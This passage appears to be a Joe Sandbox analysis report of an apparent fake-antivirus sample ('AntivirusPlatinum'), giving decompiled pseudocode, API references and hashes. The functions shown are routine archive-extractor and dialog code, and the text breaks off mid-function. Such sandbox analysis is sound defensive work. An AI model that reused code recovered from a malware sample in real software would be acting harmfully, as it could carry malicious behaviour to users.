                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$ItemShowWindowwvsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3976247692-0
                                                                                                                                                  • Opcode ID: 5f134b3a6a48b1da08cc8969ca167bcf95950b867095aa8a3e93a4b6447c38e7
                                                                                                                                                  • Instruction ID: 42f10b7e191d8a10b733246c62dab6ef4ab6fe2402209f352080973538f3fee1
                                                                                                                                                  • Opcode Fuzzy Hash: 5f134b3a6a48b1da08cc8969ca167bcf95950b867095aa8a3e93a4b6447c38e7
                                                                                                                                                  • Instruction Fuzzy Hash: 80D09EB540420E6BDF10EB90DC45FE9777DBB0430DF0440A5BB15E6080D674D61A8B69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B283(intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                  				long _t4;
                                                                                                                                                  
                                                                                                                                                  				_t4 = SendDlgItemMessageA( *0x419f80, 0x68, 0x402, E0040A8F1(_a4, _a12), 0); // executed
                                                                                                                                                  				return _t4;
                                                                                                                                                  			}




                                                                                                                                                  0x0040b2a0
                                                                                                                                                  0x0040b2a6

                                                                                                                                                  APIs
                                                                                                                                                  • SendDlgItemMessageA.USER32(00000068,00000402,00000000,?,?), ref: 0040B2A0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3015471070-0
                                                                                                                                                  • Opcode ID: 0d12b71308204e384a32f16a7f63ddf877073e16bb697978e336ecb594957348
                                                                                                                                                  • Instruction ID: 6849b772ee6339a491bc1e2b639edc61c43db45e96c8e4cd59dca12df05aa9dd
                                                                                                                                                  • Opcode Fuzzy Hash: 0d12b71308204e384a32f16a7f63ddf877073e16bb697978e336ecb594957348
                                                                                                                                                  • Instruction Fuzzy Hash: EFC01231280301BBEB02AB009D0AF5A3A22BB80700F00C928F340A40F1CBB20831EA19
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 28%
                                                                                                                                                  			_entry_(void* __eflags) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  
                                                                                                                                                  				E0040A6C0(_t3);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0); // executed
                                                                                                                                                  				E0040D33C(); // executed
                                                                                                                                                  				return 0;
                                                                                                                                                  			}




                                                                                                                                                  0x0040a7d8
                                                                                                                                                  0x0040a7df
                                                                                                                                                  0x0040a7e0
                                                                                                                                                  0x0040a7e1
                                                                                                                                                  0x0040a7e2
                                                                                                                                                  0x0040a7e3
                                                                                                                                                  0x0040a7e8

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Module$EnvironmentFileLoadNameVariable$BitmapCommandDeleteDialogHandleIconInitializeLineObjectParam
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 376930393-0
                                                                                                                                                  • Opcode ID: c41b5129d60273e9029d0afe8789ae86aa97bb8e615f6db8ce5cba5aaf9764ec
                                                                                                                                                  • Instruction ID: 281e6f1e172df0da2b3e58d9bfa8b28dbafe7f6c866a4f4aacb9b346c6845e1d
                                                                                                                                                  • Opcode Fuzzy Hash: c41b5129d60273e9029d0afe8789ae86aa97bb8e615f6db8ce5cba5aaf9764ec
                                                                                                                                                  • Instruction Fuzzy Hash: 20A002C49242407CF94075F20E07D3B005CD5402083C51C7B3C44F1092D8BD9C14003B
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E0040503E(void* __ecx) {
                                                                                                                                                  				int _t2;
                                                                                                                                                  
                                                                                                                                                  				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				return  ~(_t2 - 1) + 1;
                                                                                                                                                  			}




                                                                                                                                                  0x00405041
                                                                                                                                                  0x0040504a
                                                                                                                                                  0x0040504d

                                                                                                                                                  APIs
                                                                                                                                                  • SetEndOfFile.KERNELBASE(?,004046B2,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00405041
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 749574446-0
                                                                                                                                                  • Opcode ID: 8026bc820de6d862ce91a14b57fdf5da722ddd537d77b2a53211bf6da7feec6e
                                                                                                                                                  • Instruction ID: 14793ef18abff2b128ca596471c817456f9129885f12b962b2fa9b3f18b83a8b
                                                                                                                                                  • Opcode Fuzzy Hash: 8026bc820de6d862ce91a14b57fdf5da722ddd537d77b2a53211bf6da7feec6e
                                                                                                                                                  • Instruction Fuzzy Hash: 73B011300A000AAA8E002F30CE088203A20EA2330A300C2B0A002C82A0CB22C023AB00
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406EF6(signed char _a4, char _a8) {
                                                                                                                                                  				CHAR* _t3;
                                                                                                                                                  				CHAR* _t4;
                                                                                                                                                  
                                                                                                                                                  				_t3 = _a4 & 0x000000ff;
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					_t4 = CharUpperA(_t3); // executed
                                                                                                                                                  					return _t4;
                                                                                                                                                  				}
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}





                                                                                                                                                  0x00406efb
                                                                                                                                                  0x00406f00
                                                                                                                                                  0x00406f03
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406f03
                                                                                                                                                  0x00406f09

                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperA.USER32(?,00406F65,00000000,?,00000000,00000000,?,?,004071B6,00000000,00000000,00000000,__rar_,00000000,00000006,?), ref: 00406F03
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharUpper
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 9403516-0
                                                                                                                                                  • Opcode ID: 6bbc7cc59114ae65e0fe357eeee9f6236295800aaef3f650eca08f95825268fc
                                                                                                                                                  • Instruction ID: 10a890fd1d11d5ae954edd159976ce38f528880547e9b8c490f3023850044f8b
                                                                                                                                                  • Opcode Fuzzy Hash: 6bbc7cc59114ae65e0fe357eeee9f6236295800aaef3f650eca08f95825268fc
                                                                                                                                                  • Instruction Fuzzy Hash: 41B092A080C29129EB02A320961C72BBE942BA1301F16C89AF0D591092D1BCC524DB6D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E0040AE97(void* __ecx, void* __edx) {
                                                                                                                                                  				void* _t67;
                                                                                                                                                  				void* _t80;
                                                                                                                                                  				int _t82;
                                                                                                                                                  				signed int _t124;
                                                                                                                                                  				void* _t142;
                                                                                                                                                  				struct HICON__* _t143;
                                                                                                                                                  				void* _t146;
                                                                                                                                                  				void* _t147;
                                                                                                                                                  				void* _t148;
                                                                                                                                                  				void* _t149;
                                                                                                                                                  				void* _t150;
                                                                                                                                                  				void* _t156;
                                                                                                                                                  				signed int _t157;
                                                                                                                                                  				struct HWND__* _t163;
                                                                                                                                                  				void* _t171;
                                                                                                                                                  				void* _t173;
                                                                                                                                                  				void* _t174;
                                                                                                                                                  				void* _t176;
                                                                                                                                                  
                                                                                                                                                  				_t158 = __edx;
                                                                                                                                                  				_t156 = __ecx;
                                                                                                                                                  				_t171 = _t173 - 0x68;
                                                                                                                                                  				_t174 = _t173 - 0x95c;
                                                                                                                                                  				_t163 =  *(_t171 + 0x70);
                                                                                                                                                  				E0040309D(__edx, _t163,  *(_t171 + 0x74),  *(_t171 + 0x78),  *((intOrPtr*)(_t171 + 0x7c)), "REPLACEFILEDLG", 0, 0);
                                                                                                                                                  				_t67 =  *(_t171 + 0x74) - 0x110;
                                                                                                                                                  				if(_t67 == 0) {
                                                                                                                                                  					E0040A4AB(_t171 - 0x8f4,  *((intOrPtr*)(_t171 + 0x7c)), 0x3ff);
                                                                                                                                                  					_push(0x400);
                                                                                                                                                  					 *((char*)(_t171 - 0x4f5)) = 0;
                                                                                                                                                  					E00407A16(_t156, _t171 - 0x8f4, 0);
                                                                                                                                                  					SetDlgItemTextA(_t163, 0x65, _t171 - 0x8f4);
                                                                                                                                                  					SHGetFileInfoA(_t171 - 0x8f4, 0, _t171 - 0x4f4, 0x160, 0x100);
                                                                                                                                                  					SendDlgItemMessageA( *(_t171 + 0x70), 0x66, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                  					_t80 = FindFirstFileA(_t171 - 0x8f4, _t171 - 0x194);
                                                                                                                                                  					 *(_t171 + 0x74) = _t80;
                                                                                                                                                  					if(_t80 != 0xffffffff) {
                                                                                                                                                  						FileTimeToLocalFileTime(_t171 - 0x180, _t171 + 0x48);
                                                                                                                                                  						FileTimeToSystemTime(_t171 + 0x48, _t171 + 0x58);
                                                                                                                                                  						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                  						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                  						wsprintfA(_t171 - 0x394, "%s %s %s", E004098F7(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                  						_t176 = _t174 + 0x14;
                                                                                                                                                  						SetDlgItemTextA( *(_t171 + 0x70), 0x6a, _t171 - 0x394);
                                                                                                                                                  						FindClose( *(_t171 + 0x74));
                                                                                                                                                  						if(( *(_t171 - 0x194) & 0x00000010) == 0) {
                                                                                                                                                  							E0040A88B(_t156, _t158,  *((intOrPtr*)(_t171 - 0x174)), 0, _t171 - 0x54, 0x32);
                                                                                                                                                  							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098F7(0x80));
                                                                                                                                                  							_t176 = _t176 + 0x10;
                                                                                                                                                  							SetDlgItemTextA( *(_t171 + 0x70), 0x68, _t171 - 0x394);
                                                                                                                                                  						}
                                                                                                                                                  						SendDlgItemMessageA( *(_t171 + 0x70), 0x67, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                  						DosDateTimeToFileTime( *0x419eda & 0x0000ffff,  *0x419ed8 & 0x0000ffff, _t171 + 0x50);
                                                                                                                                                  						FileTimeToSystemTime(_t171 + 0x50, _t171 + 0x58);
                                                                                                                                                  						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                  						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                  						wsprintfA(_t171 - 0x394, "%s %s %s", E004098F7(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                  						SetDlgItemTextA( *(_t171 + 0x70), 0x6b, _t171 - 0x394);
                                                                                                                                                  						_t124 =  *0x419ee4; // 0x0
                                                                                                                                                  						_t157 =  *0x419ee0; // 0x0
                                                                                                                                                  						if(( *(_t171 - 0x194) & 0x00000010) == 0 || (_t157 | _t124) != 0) {
                                                                                                                                                  							E0040A88B(_t157, _t171 - 0x54, _t157, _t124, _t171 - 0x54, 0x32);
                                                                                                                                                  							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098F7(0x80));
                                                                                                                                                  							SetDlgItemTextA( *(_t171 + 0x70), 0x69, _t171 - 0x394);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L25:
                                                                                                                                                  					_t82 = 1;
                                                                                                                                                  					L26:
                                                                                                                                                  					return _t82;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t67 != 1) {
                                                                                                                                                  					L9:
                                                                                                                                                  					_t82 = 0;
                                                                                                                                                  					goto L26;
                                                                                                                                                  				}
                                                                                                                                                  				_push(2);
                                                                                                                                                  				_pop(1);
                                                                                                                                                  				_t142 = ( *(_t171 + 0x78) & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t142 == 0) {
                                                                                                                                                  					L14:
                                                                                                                                                  					_push(5);
                                                                                                                                                  					L15:
                                                                                                                                                  					_pop(1);
                                                                                                                                                  					L16:
                                                                                                                                                  					_t143 = SendDlgItemMessageA(_t163, 0x66, 0x171, 0, 0);
                                                                                                                                                  					if(_t143 != 0) {
                                                                                                                                                  						DestroyIcon(_t143);
                                                                                                                                                  					}
                                                                                                                                                  					EndDialog(_t163, 1);
                                                                                                                                                  					goto L25;
                                                                                                                                                  				}
                                                                                                                                                  				_t146 = _t142 - 0x6a;
                                                                                                                                                  				if(_t146 == 0) {
                                                                                                                                                  					goto L16;
                                                                                                                                                  				}
                                                                                                                                                  				_t147 = _t146 - 1;
                                                                                                                                                  				if(_t147 == 0) {
                                                                                                                                                  					goto L16;
                                                                                                                                                  				}
                                                                                                                                                  				_t148 = _t147 - 1;
                                                                                                                                                  				if(_t148 == 0) {
                                                                                                                                                  					_push(4);
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				_t149 = _t148 - 1;
                                                                                                                                                  				if(_t149 == 0) {
                                                                                                                                                  					_push(3);
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				_t150 = _t149 - 1;
                                                                                                                                                  				if(_t150 == 0) {
                                                                                                                                                  					_push(6);
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t150 == 1) {
                                                                                                                                                  					goto L14;
                                                                                                                                                  				}
                                                                                                                                                  				goto L9;
                                                                                                                                                  			}





















                                                                                                                                                  0x0040ae97
                                                                                                                                                  0x0040ae97
                                                                                                                                                  0x0040ae98
                                                                                                                                                  0x0040ae9c
                                                                                                                                                  0x0040aea5
                                                                                                                                                  0x0040aebb
                                                                                                                                                  0x0040aec3
                                                                                                                                                  0x0040aec8
                                                                                                                                                  0x0040af3e
                                                                                                                                                  0x0040af48
                                                                                                                                                  0x0040af51
                                                                                                                                                  0x0040af57
                                                                                                                                                  0x0040af6c
                                                                                                                                                  0x0040af87
                                                                                                                                                  0x0040af9e
                                                                                                                                                  0x0040afb2
                                                                                                                                                  0x0040afb8
                                                                                                                                                  0x0040afbe
                                                                                                                                                  0x0040afcf
                                                                                                                                                  0x0040afdd
                                                                                                                                                  0x0040aff1
                                                                                                                                                  0x0040b004
                                                                                                                                                  0x0040b02f
                                                                                                                                                  0x0040b031
                                                                                                                                                  0x0040b040
                                                                                                                                                  0x0040b045
                                                                                                                                                  0x0040b052
                                                                                                                                                  0x0040b062
                                                                                                                                                  0x0040b082
                                                                                                                                                  0x0040b084
                                                                                                                                                  0x0040b093
                                                                                                                                                  0x0040b093
                                                                                                                                                  0x0040b0a7
                                                                                                                                                  0x0040b0c1
                                                                                                                                                  0x0040b0cf
                                                                                                                                                  0x0040b0e4
                                                                                                                                                  0x0040b0f9
                                                                                                                                                  0x0040b11e
                                                                                                                                                  0x0040b12f
                                                                                                                                                  0x0040b138
                                                                                                                                                  0x0040b13d
                                                                                                                                                  0x0040b143
                                                                                                                                                  0x0040b153
                                                                                                                                                  0x0040b173
                                                                                                                                                  0x0040b184
                                                                                                                                                  0x0040b184
                                                                                                                                                  0x0040b143
                                                                                                                                                  0x0040b186
                                                                                                                                                  0x0040b188
                                                                                                                                                  0x0040b189
                                                                                                                                                  0x0040b190
                                                                                                                                                  0x0040b190
                                                                                                                                                  0x0040aecb
                                                                                                                                                  0x0040aeec
                                                                                                                                                  0x0040aeec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aeec
                                                                                                                                                  0x0040aed1
                                                                                                                                                  0x0040aed3
                                                                                                                                                  0x0040aed4
                                                                                                                                                  0x0040aed6
                                                                                                                                                  0x0040af04
                                                                                                                                                  0x0040af04
                                                                                                                                                  0x0040af06
                                                                                                                                                  0x0040af06
                                                                                                                                                  0x0040af07
                                                                                                                                                  0x0040af11
                                                                                                                                                  0x0040af19
                                                                                                                                                  0x0040af1c
                                                                                                                                                  0x0040af1c
                                                                                                                                                  0x0040af24
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040af24
                                                                                                                                                  0x0040aed8
                                                                                                                                                  0x0040aedb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040af01
                                                                                                                                                  0x0040aedd
                                                                                                                                                  0x0040aede
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aee0
                                                                                                                                                  0x0040aee1
                                                                                                                                                  0x0040aefb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aefb
                                                                                                                                                  0x0040aee3
                                                                                                                                                  0x0040aee4
                                                                                                                                                  0x0040aef7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aef7
                                                                                                                                                  0x0040aee6
                                                                                                                                                  0x0040aee7
                                                                                                                                                  0x0040aef3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040aef3
                                                                                                                                                  0x0040aeea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,00000171,00000000,00000000), ref: 0040AF11
                                                                                                                                                  • DestroyIcon.USER32(00000000), ref: 0040AF1C
                                                                                                                                                  • EndDialog.USER32(?,00000005), ref: 0040AF24
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040AF6C
                                                                                                                                                  • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000100), ref: 0040AF87
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,00000170,?,00000000), ref: 0040AF9E
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040AFB2
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040AFCF
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AFDD
                                                                                                                                                  • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040AFF1
                                                                                                                                                  • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B004
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B02F
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B040
                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040B045
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B082
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B093
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000067,00000170,?,00000000), ref: 0040B0A7
                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0040B0C1
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040B0CF
                                                                                                                                                  • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040B0E4
                                                                                                                                                  • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B0F9
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B11E
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B12F
                                                                                                                                                  • wsprintfA.USER32 ref: 0040B173
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B184
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$Item$File$Text$Formatwsprintf$DateMessageSend$FindSystem$CloseDestroyDialogFirstIconInfoLocal
                                                                                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                  • API String ID: 1296638866-1840816070
                                                                                                                                                  • Opcode ID: 81188f02349ff2494ade99b0fda97fe7a7c576c23cec11c941e2f9909fbb7495
                                                                                                                                                  • Instruction ID: b8757001107efa6af174484403e24566bff63b119f9254fdcbc402ae20e3f96d
                                                                                                                                                  • Opcode Fuzzy Hash: 81188f02349ff2494ade99b0fda97fe7a7c576c23cec11c941e2f9909fbb7495
                                                                                                                                                  • Instruction Fuzzy Hash: 3F912E7254021DBBEB21DFA0CD85FEB37ACEB08740F044172BB05E50D1DAB99A658B69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E00406860(intOrPtr __ecx) {
                                                                                                                                                  				char* _t48;
                                                                                                                                                  				short* _t55;
                                                                                                                                                  				signed int _t56;
                                                                                                                                                  				char _t58;
                                                                                                                                                  				short* _t59;
                                                                                                                                                  				char _t62;
                                                                                                                                                  				short* _t64;
                                                                                                                                                  				int _t65;
                                                                                                                                                  				intOrPtr _t83;
                                                                                                                                                  				void* _t86;
                                                                                                                                                  				char* _t87;
                                                                                                                                                  				int _t94;
                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                  				void* _t96;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  
                                                                                                                                                  				_t96 = _t98 - 0x74;
                                                                                                                                                  				_t48 =  *(__ecx + 0xc);
                                                                                                                                                  				 *((intOrPtr*)(_t96 + 0x60)) = __ecx;
                                                                                                                                                  				if(_t48 == 0) {
                                                                                                                                                  					L27:
                                                                                                                                                  					return _t48;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t96 + 0x64) = 0;
                                                                                                                                                  				 *((intOrPtr*)( *_t48 + 0x2c))(_t48, L"about:blank", 0, 0, 0, 0, _t86);
                                                                                                                                                  				_t83 = __ecx;
                                                                                                                                                  				 *((char*)(_t96 + 0x6b)) = E004065B9( *(_t96 + 0x7c));
                                                                                                                                                  				_t94 = 0x100 + lstrlenA( *(_t96 + 0x7c)) * 6;
                                                                                                                                                  				_t48 = GlobalAlloc(0x40, _t94);
                                                                                                                                                  				_t87 = _t48;
                                                                                                                                                  				if(_t87 == 0) {
                                                                                                                                                  					L26:
                                                                                                                                                  					goto L27;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t96 - 0x38) = 0x94;
                                                                                                                                                  				GetVersionExA(_t96 - 0x38);
                                                                                                                                                  				if( *((intOrPtr*)(_t96 - 0x28)) != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					 *((char*)(_t96 + 0x73)) = 1;
                                                                                                                                                  					L5:
                                                                                                                                                  					E0040A477(_t87, "<html>");
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                  						E0040A5E2(_t87, "<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                                                                                                                  						 *((intOrPtr*)(_t96 + 0x5c)) = E0040A384(_t83, _t87) + _t87;
                                                                                                                                                  						E0040A5E2(_t87, "utf-8\"></head>");
                                                                                                                                                  					}
                                                                                                                                                  					_t55 =  *(_t96 + 0x7c);
                                                                                                                                                  					 *(_t96 + 0x6c) = _t55;
                                                                                                                                                  					L9:
                                                                                                                                                  					if( *_t55 == 0x20) {
                                                                                                                                                  						 *(_t96 + 0x6c) =  &(( *(_t96 + 0x6c))[0]);
                                                                                                                                                  						_t55 =  *(_t96 + 0x6c);
                                                                                                                                                  						goto L9;
                                                                                                                                                  					}
                                                                                                                                                  					_t56 = E0040A5BD( *(_t96 + 0x6c), "<html>", 6);
                                                                                                                                                  					asm("sbb al, al");
                                                                                                                                                  					_t58 =  ~_t56 + 1;
                                                                                                                                                  					 *((char*)(_t96 + 0x6a)) = _t58;
                                                                                                                                                  					if(_t58 == 0) {
                                                                                                                                                  						_t59 =  *(_t96 + 0x7c);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t59 =  &(( *(_t96 + 0x6c))[3]);
                                                                                                                                                  					}
                                                                                                                                                  					E0040A5E2(_t87, _t59);
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x6a)) == 0) {
                                                                                                                                                  						E0040A5E2(_t87, "</html>");
                                                                                                                                                  					}
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x6b)) == 0) {
                                                                                                                                                  						E004065E9( *((intOrPtr*)(_t96 + 0x60)), _t87);
                                                                                                                                                  					}
                                                                                                                                                  					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
